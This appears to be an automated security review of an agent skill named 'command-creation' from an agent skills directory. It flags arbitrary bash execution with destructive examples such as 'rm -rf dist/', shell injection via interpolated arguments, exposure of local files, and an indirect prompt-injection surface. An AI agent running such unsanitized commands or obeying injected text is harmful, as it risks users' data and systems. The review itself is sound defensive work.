The Agent Skills Directory

[COMMAND_EXECUTION]: The skill defines a syntax !command that allows the execution of arbitrary bash commands. While documentation suggests using read-only commands, it explicitly provides examples for destructive or system-modifying operations, such as `rm -rf dist/` (references/common-patterns.md) and `git checkout` (references/common-patterns.md), which pose a risk of data loss or unauthorized state changes.\n- **[COMMAND_EXECUTION]:** Command templates support the direct interpolation of positional arguments ($1, $2, etc.) into shell commands (e.g., `!`npm test -- $1 --coverage in references/template-syntax.md). This pattern is highly susceptible to shell injection attacks, as malicious arguments containing metacharacters (e.g., ;, &, |) can be used to execute unauthorized commands. The skill provides no guidance or mechanisms for sanitizing or escaping these inputs.\n- [DATA_EXFILTRATION]: The skill documents and encourages the use of file references (@path/to/file) and shell commands (like git log, find, and cat) to include local file contents and repository metadata in the agent's context (SKILL.md, references/template-syntax.md). This capability facilitates the potentially unauthorized access and exposure of sensitive source code or project configuration.\n- [PROMPT_INJECTION]: The skill facilitates an indirect prompt injection surface by interpolating untrusted command arguments into prompt templates.\n
Ingestion points: Command arguments ($ARGUMENTS, $1, $2, etc.) identified in references/template-syntax.md.\n
Boundary markers: Absent; no delimitation or instructions to ignore embedded commands are included in the provided templates.\n
Capability inventory: File system access via @ and arbitrary shell command execution via ! identified in SKILL.md.\n
Sanitization: No evidence of argument sanitization, escaping, or validation logic is present in the skill instructions or examples.

command-creation